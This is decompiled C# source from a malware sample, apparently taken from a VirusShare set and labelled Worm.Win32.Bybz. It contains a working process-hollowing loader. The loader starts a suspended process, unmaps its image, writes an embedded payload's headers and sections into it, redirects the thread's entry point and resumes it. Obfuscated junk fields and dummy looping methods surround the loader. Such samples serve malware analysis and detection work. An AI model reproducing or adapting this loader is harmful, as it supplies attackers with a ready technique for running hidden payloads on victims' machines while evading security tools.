// Decompiled with JetBrains decompiler // Type: ajhfsdlhjasnagfgewfwsg.sadisaduoiasudoiwqueoixzucoixzuocisad // Assembly: Rokan, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null // MVID: 170F4640-026D-46A0-96EF-63F7CE568476 // Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Worm.Win32.Bybz.dma-ede80954aa264e7f1fb365b2d83e8d211c6a79e95bdca110aeaef84c696635db.exe using Microsoft.VisualBasic.CompilerServices; using System; using System.ComponentModel; using System.Diagnostics; using System.Reflection; using System.Runtime.InteropServices; namespace ajhfsdlhjasnagfgewfwsg { internal class sadisaduoiasudoiwqueoixzucoixzuocisad { private string HMGRHOOWTYJMKSGVYLXSJXYXWQTUIT; private string GMLYNVKNGDROIKNXTAWXVQJZNTMILN; private string STJLEYRSWSSLZQNPZFVNLQZKINBMVD; private string QSNRJFNKIXAOXJVRVUUSYJKMZPUAXX; private string PSSYPLJCVCHQVBDTQKSXKCVORSMOAR; private string BZQLGPQHLQINLHDLWPSNACKZLMBSKH; private string AZUSMVMYYVQQJZKNRERSNVVBDOUGNB; private string MGSEDZUDNKRNZFKFYJQIDVKMYIJKXR; private string KFWLIFPVAPZPYYSHTYPNQOVOPLBYAL; private string JFBSOMLNNUHSWQAJONNSCHGQHNUMCF; private string VMZEFPTSCJIOMWABUSNISHWBBHJQMV; private string TMDLLWOJPOQRKOHDQHMNFAHDTKBEPP; private string SLISQCKBCTYUIHPFLXKSRTSFLMUSSJ; private string ESFFHGSGRHZQZNPXRCKIHTHRFGJWCZ; private string DSKLNMNYEMHTXFXZNRINUMSTXJBKFT; private string PZIYEQVDUBIQNLXRTWICKMHERCQOPI; private string NZMFKWRUHGQSLDETOLHIWFSGJFJCSD; private string MYRMPDMMTLYVJWMVJAFNJZDIBIBQUX; private string YFOYGGURJAZSACMNQFFDZYTTVBQUEN; private string XFTFMNQJWFHUYUUPLUDIMSDVNEJIHH; private string VEYMRUMAIKPXWNBQGKCNYLOXEHBWKB; private string HMVYJXTFYYQUMSBJMPCDOLEIZAQAUR; private string GLAFOEPXLDYWKLJLIEAIBEPKRDJOXL; private string SSXSFHWCASZTARJDOJAXREEVLXYSHA; private string RSCZLOSUNXHWZJRFJYYDDXPXDZQGJV; private string PRHGQUOLACOYXCYGFNXIQQAZUCJUMP; private string BZESIYVQQRPVNIYZLSXXGQPLPWYYWE; private string AYJZNERICWXYLAGAGHVDSJANGZQMZZ; private string YYOGTLNAPBFAKSOCBXUIFCLPYBJACT; private string KFLSKOUFFQGXAYOUICTYVCBASVYEMJ; private string JEQZQVQWRVOZYRVWDRSDHVMCKYRSOD; private string VMNMHYXBHJPWOXVOJWSSXVBNERFWYS; private string PWSZKCWCSFFRTVRRWULDYBEFNXKTDSVTXDLMIXPZMHVINK; private string NWXGQJRUFKNTRNZTSJJJLUPHFADHGNCMSWNEPEGWEOFRZK; private string ADUSHMZYVZOQHTYLYPJYBUESZTSLQCSLYQYYSDCIQCDCZG; private string YDZZNTVQHEWTFLGNTEIDNNPURWKZTWYDUJZRAKTFHKMLLG; private string KKWMEWCVXSXPVRGFZJHTDNFFLQZDDMODADKLDJPRTYLXLD; private string JJBTJDYNKXFSUKOHVYGYQGQHDTSRGGUVWWLEKRHOLGUGXC; private string HJGAPKUFWCMUSCWJQNEDCZBJVVLFIBAORPNXSYYMCNEOJC; private string TQDMGNBJMRNRIIVBWSETSZQVPPZJSQQNXJYRVXUYOCCAJZ; private string SQITMUXBZWVUGBDDRHDYFSBXHSSXVKWGTCZKDFLVFJLJVZ; private string JZXVDZBUKWSWEKVEYSYOYHWDCJYHUZYJLQFMXHPWMNDHED; private string DWKMJEAYBQETVZLXTCBTHLBKTOAPIUSXVOLWNLYEJFTDIV; private string BWPTOKWQOVMWTRTZORZYUEMMLRSDLOZQQHNPVSPBAMDMUV; private string NDMGFODUEJNTJXSRUWZOKECXFKHHVEOPWBYJYSLNMBBXUR; private string MDRNLUZMQOVVHQATQLYTXXMZXNAVXYVISUZCFZCKEIKGGR; private string LCWTQBVEDTDYFIIULAWYJRXBPQSJASBAONBVNGUHVQUPSR; private string XJTGIECJTIEVVOINRFWOZQNMJJHNKIRAUHMPQFQTHESASN; private string VJYNNLYBFNMXUGQONUUTMJYOBMABNCXSPANHXNHQZLCJEN; private string UIDUTRUSSSUASZXQIJTYYDJQSPSPQXDLLTPAFUYNQTLSQN; private string GQAGKVBXIHVWIFXIOPTOOCYBNIHTAMTKRNZUITUZCHKDQK; private string EPFNPBXPUMDZGXFKJERTBWJDELAHCGZCNGBNQBLWTPTMCJ; private string RWCZHFFUKAEWWDFDQJRJRVYPZFPLMWPCTZMHTAHIFDRYCG; private string PWHGMLALXFMYVVNELYPODPJRQHHZPQVUOTNAAHYGXLBGOG; private string OVMNSSWDJKUBTOUGGNOTQIUTIKANSKCNKMPTIOQDOSKPBF; private string ADJAJVEIZZVYJUUYMSOJGIKECEPRCASMQFZNLNMPAHJBBC; private string YCOHOCZAMEDAHMCAIHMOSBVGUGHFFUYFMYBFSVDMSOSKNC; private string XCTNUJVSYJKDFFKCDWLTFUGIMJATIPEXHRCYACUJJVCSZB; private string JJQALMDWOYMAWKKUJCKJVUVTGDPXSEUWNLNSDBQVVKAEZY; private string IIVHRTZOBDTCUDRWFRJOINGVYFHLUYAPJEPLLJHSNRJNLY; private string UQSTIWGTRRUZKJROLWJDYNVGSZWPEOQOPYZFOIDEYGIYLU; private string SPXANCCLDXCCIBZQGLHJKGGIKCPDHIWHLRBYVPUBQNRHXU; private string RPCHTJYDQCKEGUHSBAGOXZRKCFHRKCDZGKCRDWMYHVBQJU; private string DWZUKMFHGQLBWAHKIFFENZHVWYWVUSSZMENLGWIKTJZBJR; private string CVEAQTBZSVTEVSOMDUEJZSRXOBPJXMZRIXPDNDZHLQIKVQ; private string AVJHVAXRFABGTKWOYJDOMMCZGEIXZGFKEQQWVKQECYSTIQ; private string MCGUMDEWVPCDJQWGEPCECLSLAXWBJWVJKJBQYJMQOMQEHN; private string LCLBSKAOHUKGHJEIAEBJOFDNSAPPMQBBFCCJGRDOGUANUM; private string XJINJNHSXJLCXPEAGJAYEESYMTEUWFRBLWNDJQZZRIYZTJ; private string VINUPUDKKOTFWHLCBYZERXDAEWXHZAXTHPPWQXQXJQIHGJ; private string UISBUAZCWTBHUZTEXNYJEROCVZPVCUDMDIQPYFIUBXRQSI; private string GPPNLEGHMHCEKFTWDSXYUQDNQSEAMKTLJCBIBEEGMMPCSF; private string FPUURKCYZMKHIYBYYHWEGKOPHVXOOEZEEVDBILVDETZLEF; private string DOZBWRYQMRSJGQIATWVJTDZRZYPBRYGWAOEUQSMAVAITQF; private string PVWOOUFVBGTGXWISACUZJDPCTSEGBOWVGIPOTRIMHPHFQB; private string OVBUTBBNOLBJVOQUVRTEVWAELUXUEICOCBQHAZZJZWQOCB; private string ACYHKEJSEACGLUQMBWSTLWPPGOMYOXSNIVBBEYVVKLOZCY; private string ZCDOQLEJQFKIJNYOWLRZYPARXREMRSYGDODULFMSCSYIOX; private string XBIVWRABDKRLHFFQSAQEKILTPTXAUMEYZHEMTNEPUAHRAX; private string JIFHNVIGTYTIYLFIYFPTAIAFJNMEECUYFAPGWMABFOGCAU; private string IIKOSBDYFDAKWENKTUOZNBLHBQESGWAQBTQZDTRYXVPLNT; private string GIPVYIZQSIINUWVMPJNEZUWJTSXGJQGJWMSSLAIVPDZUZT; private string TPMHPLHUIXJJKCVEVPMTPUMUNMMKTGWICGDMOAEHARXFZQ; private string ROROVSCMVCRMIUCGQELZCNWWFPEYWADAYZEFVHVFSZGOLP; private string DVOBMVKRKRSJYACYWJKOSNMHZITCGPSAETPZYGRQDNFALM; private string CVTIRCGJXWALXTKASYJUFGXJRLMQJKZSAMQSGNIOVVOIXM; private string AVYPXJBBKBIOVLSCNNIZRAILJOEELEFLVFSKOVALNCYRJM; private string NCVBOMJFZPJLLRSUTSHOHZXWDHTIVTVKBZDERUWXYRWDJI; private string LBAIUTFXMURNJJZWOHGUUTIYVKMWYOBDXSEXYBNUQYFLVI; private string KBFPZZAPZAZQHCHYKWEZGMTAMNFKBIHVTLGQGJERIFPUHI; private string WICBQDIUOOANYIHQQCEOWLILHGTOLYXUZFQKJIADTUNGHE; private string UIHIWJEMBTIPWAPSLRDUJFTNZJMCOSDNUYSDQPRALBXPTE; private string GPEVNNLQRIJMMGPKSWCJZEJZTDBGYHTMARDXTONMWQVATB; private string FOJBTTHIENRPKYWMNLBOLYUBLFUUACZFWKEQBVEJOXFJGA; private string EOOIYADAQSZRIREOIAZUYRFDCIMIDWGXSDGIJDWGGFOSSA; private string QVLVPDKFGHAOZXEGOFZJORUOXCBMNLWXYXQCMCRSRTMDSX; private string OVQCVKGWTMIRXPMIKUYPAKFQOEUAQGCPTQSVTJJPJAWMEX; [DebuggerNonUserCode] public sadisaduoiasudoiwqueoixzucoixzuocisad() { } public static void Execute(byte[] data) => sadisaduoiasudoiwqueoixzucoixzuocisad.Execute(data, Assembly.GetEntryAssembly().Location); public static void Execute(byte[] data, string target) { sadisaduoiasudoiwqueoixzucoixzuocisad.H.Context context = new sadisaduoiasudoiwqueoixzucoixzuocisad.H.Context(); sadisaduoiasudoiwqueoixzucoixzuocisad.H.Process_Information processInformation = new sadisaduoiasudoiwqueoixzucoixzuocisad.H.Process_Information(); sadisaduoiasudoiwqueoixzucoixzuocisad.H.Startup_Information structure1 = new sadisaduoiasudoiwqueoixzucoixzuocisad.H.Startup_Information(); sadisaduoiasudoiwqueoixzucoixzuocisad.H.Security_Flags securityFlags1 = new sadisaduoiasudoiwqueoixzucoixzuocisad.H.Security_Flags(); sadisaduoiasudoiwqueoixzucoixzuocisad.H.Security_Flags securityFlags2 = new sadisaduoiasudoiwqueoixzucoixzuocisad.H.Security_Flags(); GCHandle gcHandle = GCHandle.Alloc((object) data, GCHandleType.Pinned); IntPtr ptr = gcHandle.AddrOfPinnedObject(); int int32 = ptr.ToInt32(); sadisaduoiasudoiwqueoixzucoixzuocisad.H.DOS_Header dosHeader1 = new sadisaduoiasudoiwqueoixzucoixzuocisad.H.DOS_Header(); object structure2 = Marshal.PtrToStructure(gcHandle.AddrOfPinnedObject(), dosHeader1.GetType()); sadisaduoiasudoiwqueoixzucoixzuocisad.H.DOS_Header dosHeader2; sadisaduoiasudoiwqueoixzucoixzuocisad.H.DOS_Header dosHeader3 = structure2 != null ? (sadisaduoiasudoiwqueoixzucoixzuocisad.H.DOS_Header) structure2 : dosHeader2; gcHandle.Free(); string str1 = (string) null; ref string local1 = ref str1; ref string local2 = ref target; ref sadisaduoiasudoiwqueoixzucoixzuocisad.H.Security_Flags local3 = ref securityFlags1; ref sadisaduoiasudoiwqueoixzucoixzuocisad.H.Security_Flags local4 = ref securityFlags2; IntPtr num1; IntPtr system = num1; string str2 = (string) null; ref string local5 = ref str2; ref sadisaduoiasudoiwqueoixzucoixzuocisad.H.Startup_Information local6 = ref structure1; ref sadisaduoiasudoiwqueoixzucoixzuocisad.H.Process_Information local7 = ref processInformation; if (-(sadisaduoiasudoiwqueoixzucoixzuocisad.H.CreateProcess(ref local1, ref local2, ref local3, ref local4, false, 4U, system, ref local5, ref local6, out local7) ? 1 : 0) == 0) return; sadisaduoiasudoiwqueoixzucoixzuocisad.H.NT_Headers ntHeaders1 = new sadisaduoiasudoiwqueoixzucoixzuocisad.H.NT_Headers(); ptr = new IntPtr(checked (int32 + dosHeader3.Address)); object structure3 = Marshal.PtrToStructure(ptr, ntHeaders1.GetType()); sadisaduoiasudoiwqueoixzucoixzuocisad.H.NT_Headers ntHeaders2; sadisaduoiasudoiwqueoixzucoixzuocisad.H.NT_Headers ntHeaders3 = structure3 != null ? (sadisaduoiasudoiwqueoixzucoixzuocisad.H.NT_Headers) structure3 : ntHeaders2; structure1.CB = Marshal.SizeOf((object) structure1); context.Flags = 65538U; if (ntHeaders3.Signature != 17744U | dosHeader3.Magic != (ushort) 23117) return; int num2 = sadisaduoiasudoiwqueoixzucoixzuocisad.H.GetThreadContext(processInformation.Thread, ref context) ? 1 : 0; IntPtr process1 = processInformation.Process; IntPtr address1 = (IntPtr) checked ((long) context.Ebx + 8L); IntPtr num3; ref IntPtr local8 = ref num3; IntPtr size1 = (IntPtr) 4; int num4 = 0; ref int local9 = ref num4; int num5 = sadisaduoiasudoiwqueoixzucoixzuocisad.H.ReadProcessMemory(process1, address1, ref local8, size1, ref local9) >= 0 ? 1 : 0; if ((num2 & num5 & (sadisaduoiasudoiwqueoixzucoixzuocisad.H.ZwUnmapViewOfSection(processInformation.Process, num3) >= 0L ? 1 : 0)) == 0) return; uint num6 = checked ((uint) (int) sadisaduoiasudoiwqueoixzucoixzuocisad.H.VirtualAllocEx(processInformation.Process, (IntPtr) (long) ntHeaders3.Optional.Image, ntHeaders3.Optional.SImage, 12288U, 4U)); if (num6 == 0U) return; IntPtr process2 = processInformation.Process; IntPtr address2 = (IntPtr) (long) num6; byte[] buffer1 = data; IntPtr sheaders = (IntPtr) (long) ntHeaders3.Optional.SHeaders; uint num7; int num8 = checked ((int) num7); ref int local10 = ref num8; sadisaduoiasudoiwqueoixzucoixzuocisad.H.WriteProcessMemory(process2, address2, buffer1, sheaders, out local10); uint num9 = checked ((uint) num8); long num10 = (long) checked (dosHeader3.Address + 248); int num11 = checked ((int) ntHeaders3.File.Sections - 1); int num12 = 0; int num13; while (num12 <= num11) { ptr = new IntPtr(checked ((long) int32 + num10 + (long) (num12 * 40))); sadisaduoiasudoiwqueoixzucoixzuocisad.H.Section_Header sectionHeader1; object structure4 = Marshal.PtrToStructure(ptr, sectionHeader1.GetType()); sadisaduoiasudoiwqueoixzucoixzuocisad.H.Section_Header sectionHeader2; sectionHeader1 = structure4 != null ? (sadisaduoiasudoiwqueoixzucoixzuocisad.H.Section_Header) structure4 : sectionHeader2; byte[] numArray = new byte[checked ((int) sectionHeader1.Size + 1)]; int num14 = checked ((int) ((long) sectionHeader1.Size - 1L)); int index = 0; while (index <= num14) { numArray[index] = data[checked ((int) ((long) sectionHeader1.Pointer + (long) index))]; checked { ++index; } } IntPtr process3 = processInformation.Process; IntPtr address3 = (IntPtr) (long) checked (num6 + sectionHeader1.Address); byte[] buffer2 = numArray; IntPtr size2 = (IntPtr) (long) sectionHeader1.Size; num13 = checked ((int) num9); ref int local11 = ref num13; sadisaduoiasudoiwqueoixzucoixzuocisad.H.WriteProcessMemory(process3, address3, buffer2, size2, out local11); num9 = checked ((uint) num13); sadisaduoiasudoiwqueoixzucoixzuocisad.H.VirtualProtectEx(processInformation.Process, (IntPtr) (long) checked (num6 + sectionHeader1.Address), (UIntPtr) sectionHeader1.Misc.Size, (UIntPtr) checked ((ulong) sadisaduoiasudoiwqueoixzucoixzuocisad.Protect((long) sectionHeader1.Flags)), checked ((uint) (int) num3)); checked { ++num12; } } byte[] bytes = BitConverter.GetBytes(num6); IntPtr process4 = processInformation.Process; IntPtr address4 = (IntPtr) checked ((long) context.Ebx + 8L); byte[] buffer3 = bytes; IntPtr size3 = (IntPtr) 4; num13 = checked ((int) num9); ref int local12 = ref num13; sadisaduoiasudoiwqueoixzucoixzuocisad.H.WriteProcessMemory(process4, address4, buffer3, size3, out local12); num7 = checked ((uint) num13); context.Eax = checked (num6 + ntHeaders3.Optional.Address); sadisaduoiasudoiwqueoixzucoixzuocisad.H.SetThreadContext(processInformation.Thread, ref context); int num15 = (int) sadisaduoiasudoiwqueoixzucoixzuocisad.H.ResumeThread(processInformation.Thread); } private static long Protect(long flags) { if (flags < 0L) checked { flags += 4294967296L; } return new long[8] { 1L, 16L, 2L, 32L, 4L, 64L, 4L, 64L }[checked ((int) Math.Round(unchecked ((double) flags / 841.0)))]; } public void rufysdnlfthpadkfktjspdiogusdpfjkpaosjkfpejmjdfkfjp_FuQDHuMY2025034873() { try { } catch (Exception ex) { ProjectData.SetProjectError(ex); ProjectData.ClearProjectError(); } try { } catch (Exception ex) { ProjectData.SetProjectError(ex); ProjectData.ClearProjectError(); } double num = 0.2710239; do { try { } catch (Exception ex) { ProjectData.SetProjectError(ex); ProjectData.ClearProjectError(); } ++num; } while (num <= 0.4629713); } public void rufysdnlfthpadkfktjspdiogusdpfjkpaosjkfpejmjdfkfjp_lmwQbUgmOoeI2002682959() { try { } catch (Exception ex) { ProjectData.SetProjectError(ex); ProjectData.ClearProjectError(); } try { } catch (Exception ex) { ProjectData.SetProjectError(ex); ProjectData.ClearProjectError(); } while (true) ; } public void rufysdnlfthpadkfktjspdiogusdpfjkpaosjkfpejmjdfkfjp_gpwuQobJL341053670() { try { } catch (Exception ex) { ProjectData.SetProjectError(ex); ProjectData.ClearProjectError(); } double num1 = 0.7916495; do { try { } catch (Exception ex) { ProjectData.SetProjectError(ex); ProjectData.ClearProjectError(); } ++num1; } while (num1 <= 0.8058189); try { } catch (Exception ex) { ProjectData.SetProjectError(ex); ProjectData.ClearProjectError(); } double num2 = 0.2101725; do { ++num2; } while (num2 <= 0.2262142); try { } catch (Exception ex) { ProjectData.SetProjectError(ex); ProjectData.ClearProjectError(); } } public void rufysdnlfthpadkfktjspdiogusdpfjkpaosjkfpejmjdfkfjp_YgPWEqqfBWlFrUpB16952860() { try { } catch (Exception ex) { ProjectData.SetProjectError(ex); ProjectData.ClearProjectError(); } if (0.2939498 <= 0.07052416) { try { } catch (Exception ex) { ProjectData.SetProjectError(ex); ProjectData.ClearProjectError(); } while (true) { try { } catch (Exception ex) { ProjectData.SetProjectError(ex); ProjectData.ClearProjectError(); } } } else { while (true) { try { } catch (Exception ex) { ProjectData.SetProjectError(ex); ProjectData.ClearProjectError(); } } } } public void rufysdnlfthpadkfktjspdiogusdpfjkpaosjkfpejmjdfkfjp_geuXkWHFMaMChUIt864161822() { try { } catch (Exception ex) { ProjectData.SetProjectError(ex); ProjectData.ClearProjectError(); } try { } catch (Exception ex) { ProjectData.SetProjectError(ex); ProjectData.ClearProjectError(); } while (true) ; } public void rufysdnlfthpadkfktjspdiogusdpfjkpaosjkfpejmjdfkfjp_nECAJKceBhUUNawb1480997800() { while (true) { try { } catch (Exception ex) { ProjectData.SetProjectError(ex); ProjectData.ClearProjectError(); } } } public void rufysdnlfthpadkfktjspdiogusdpfjkpaosjkfpejmjdfkfjp_dpaMDuVkjPnwS530910597() { while (true) { try { } catch (Exception ex) { ProjectData.SetProjectError(ex); ProjectData.ClearProjectError(); } } } public void rufysdnlfthpadkfktjspdiogusdpfjkpaosjkfpejmjdfkfjp_ERBqFbRB105420778() { for (double num = 0.3396568; num <= 0.2412645; ++num) { try { } catch (Exception ex) { ProjectData.SetProjectError(ex); ProjectData.ClearProjectError(); } } try { } catch (Exception ex) { ProjectData.SetProjectError(ex); ProjectData.ClearProjectError(); } double num1 = 0.849157; while (num1 <= 0.2866166) ++num1; } public void rufysdnlfthpadkfktjspdiogusdpfjkpaosjkfpejmjdfkfjp_GRTXFOXDbbgxjbWoJU1859221943() { try { } catch (Exception ex) { ProjectData.SetProjectError(ex); ProjectData.ClearProjectError(); } double num = 0.005078852; do { try { } catch (Exception ex) { ProjectData.SetProjectError(ex); ProjectData.ClearProjectError(); } try { } catch (Exception ex) { ProjectData.SetProjectError(ex); ProjectData.ClearProjectError(); } ++num; } while (num <= 0.6185946); } public void rufysdnlfthpadkfktjspdiogusdpfjkpaosjkfpejmjdfkfjp_nmrQWLk2018461527() { try { } catch (Exception ex) { ProjectData.SetProjectError(ex); ProjectData.ClearProjectError(); } try { } catch (Exception ex) { ProjectData.SetProjectError(ex); ProjectData.ClearProjectError(); } if (0.9356374 <= 0.7325586) { while (true) ; } else { try { } catch (Exception ex) { ProjectData.SetProjectError(ex); ProjectData.ClearProjectError(); } while (true) ; } } public void rufysdnlfthpadkfktjspdiogusdpfjkpaosjkfpejmjdfkfjp_qnTBP1344562940() { try { } catch (Exception ex) { ProjectData.SetProjectError(ex); ProjectData.ClearProjectError(); } while (true) ; } public void rufysdnlfthpadkfktjspdiogusdpfjkpaosjkfpejmjdfkfjp_YDRyFFHWgsSUjghdyN275736892() { try { } catch (Exception ex) { ProjectData.SetProjectError(ex); ProjectData.ClearProjectError(); } while (true) ; } public void rufysdnlfthpadkfktjspdiogusdpfjkpaosjkfpejmjdfkfjp_QsKIdRqHskVT85619494() { } public void rufysdnlfthpadkfktjspdiogusdpfjkpaosjkfpejmjdfkfjp_omKFvdbkavhuVbIfK892757530() { try { } catch (Exception ex) { ProjectData.SetProjectError(ex); ProjectData.ClearProjectError(); } while (true) ; } public void rufysdnlfthpadkfktjspdiogusdpfjkpaosjkfpejmjdfkfjp_pSnegMwGMfVvnPCpFkl1971118203() { try { } catch (Exception ex) { ProjectData.SetProjectError(ex); ProjectData.ClearProjectError(); } try { } catch (Exception ex) { ProjectData.SetProjectError(ex); ProjectData.ClearProjectError(); } while (true) ; } [EditorBrowsable(EditorBrowsableState.Never)] internal class H { [DebuggerNonUserCode] public H() { } [DllImport("kernel32", CharSet = CharSet.Auto, SetLastError = true)] public static extern bool CreateProcess( [MarshalAs(UnmanagedType.VBByRefStr)] ref string name, [MarshalAs(UnmanagedType.VBByRefStr)] ref string command, ref sadisaduoiasudoiwqueoixzucoixzuocisad.H.Security_Flags process, ref sadisaduoiasudoiwqueoixzucoixzuocisad.H.Security_Flags thread, bool inherit, uint flags, IntPtr system, [MarshalAs(UnmanagedType.VBByRefStr)] ref string current, [In] ref sadisaduoiasudoiwqueoixzucoixzuocisad.H.Startup_Information startup, out sadisaduoiasudoiwqueoixzucoixzuocisad.H.Process_Information info); [DllImport("kernel32", CharSet = CharSet.Auto, SetLastError = true)] public static extern bool WriteProcessMemory( IntPtr process, IntPtr address, byte[] buffer, IntPtr size, out int written); [DllImport("kernel32", CharSet = CharSet.Auto, SetLastError = true)] public static extern int ReadProcessMemory( IntPtr process, IntPtr address, ref IntPtr buffer, IntPtr size, ref int read); [DllImport("kernel32", CharSet = CharSet.Auto, SetLastError = true)] public static extern int VirtualProtectEx( IntPtr process, IntPtr address, UIntPtr size, UIntPtr @new, [Out] uint old); [DllImport("kernel32", CharSet = CharSet.Auto, SetLastError = true)] public static extern IntPtr VirtualAllocEx( IntPtr process, IntPtr address, uint size, uint type, uint protect); [DllImport("ntdll", CharSet = CharSet.Auto, SetLastError = true)] public static extern long ZwUnmapViewOfSection(IntPtr process, IntPtr address); [DllImport("kernel32", CharSet = CharSet.Auto, SetLastError = true)] public static extern uint ResumeThread(IntPtr thread); [DllImport("kernel32", CharSet = CharSet.Auto, SetLastError = true)] public static extern bool GetThreadContext( IntPtr thread, ref sadisaduoiasudoiwqueoixzucoixzuocisad.H.Context context); [DllImport("kernel32", CharSet = CharSet.Auto, SetLastError = true)] public static extern bool SetThreadContext( IntPtr thread, ref sadisaduoiasudoiwqueoixzucoixzuocisad.H.Context context); public struct Context { public uint Flags; public uint D0; public uint D1; public uint D2; public uint D3; public uint D6; public uint D7; public sadisaduoiasudoiwqueoixzucoixzuocisad.H.Save Save; public uint SG; public uint SF; public uint SE; public uint SD; public uint Edi; public uint Esi; public uint Ebx; public uint Edx; public uint Ecx; public uint Eax; public uint Ebp; public uint Eip; public uint SC; public uint EFlags; public uint Esp; public uint SS; [MarshalAs(UnmanagedType.ByValArray, SizeConst = 512)] public byte[] Registers; } public struct Save { public uint Control; public uint Status; public uint Tag; public uint ErrorO; public uint ErrorS; public uint DataO; public uint DataS; [MarshalAs(UnmanagedType.ByValArray, SizeConst = 80)] public byte[] RegisterArea; public uint State; } public struct Misc { public uint Address; public uint Size; } public struct Section_Header { public byte Name; public sadisaduoiasudoiwqueoixzucoixzuocisad.H.Misc Misc; public uint Address; public uint Size; public uint Pointer; public uint PRelocations; public uint PLines; public uint NRelocations; public uint NLines; public uint Flags; } public struct Process_Information { public IntPtr Process; public IntPtr Thread; public int ProcessId; public int ThreadId; } [StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)] public struct Startup_Information { public int CB; public string ReservedA; public string Desktop; public string Title; public int X; public int Y; public int XSize; public int YSize; public int XCount; public int YCount; public int Fill; public int Flags; public short ShowWindow; public short ReservedB; public int ReservedC; public int Input; public int Output; public int Error; } public struct Security_Flags { public int Length; public IntPtr Descriptor; public int Inherit; } public struct DOS_Header { public ushort Magic; public ushort Last; public ushort Pages; public ushort Relocations; public ushort Size; public ushort Minimum; public ushort Maximum; public ushort SS; public ushort SP; public ushort Checksum; public ushort IP; public ushort CS; public ushort Table; public ushort Overlay; [MarshalAs(UnmanagedType.ByValArray, SizeConst = 4)] public ushort[] ReservedA; public ushort ID; public ushort Info; [MarshalAs(UnmanagedType.ByValArray, SizeConst = 10)] public ushort[] ReservedB; public int Address; } public struct NT_Headers { public uint Signature; public sadisaduoiasudoiwqueoixzucoixzuocisad.H.File_Header File; public sadisaduoiasudoiwqueoixzucoixzuocisad.H.Optional_Headers Optional; } public struct File_Header { public ushort Machine; public ushort Sections; public uint Stamp; public uint Table; public uint Symbols; public ushort Size; public ushort Flags; } public struct Optional_Headers { public ushort Magic; public byte Major; public byte Minor; public uint SCode; public uint IData; public uint UData; public uint Address; public uint Code; public uint Data; public uint Image; public uint SectionA; public uint FileA; public ushort MajorO; public ushort MinorO; public ushort MajorI; public ushort MinorI; public ushort MajorS; public ushort MinorS; public uint Version; public uint SImage; public uint SHeaders; public uint Checksum; public ushort Subsystem; public ushort Flags; public uint SSReserve; public uint SSCommit; public uint SHReserve; public uint SHCommit; public uint LFlags; public uint Count; [MarshalAs(UnmanagedType.ByValArray, SizeConst = 16)] public sadisaduoiasudoiwqueoixzucoixzuocisad.H.Data_Directory[] DataDirectory; } public struct Data_Directory { public uint Address; public uint Size; } } } }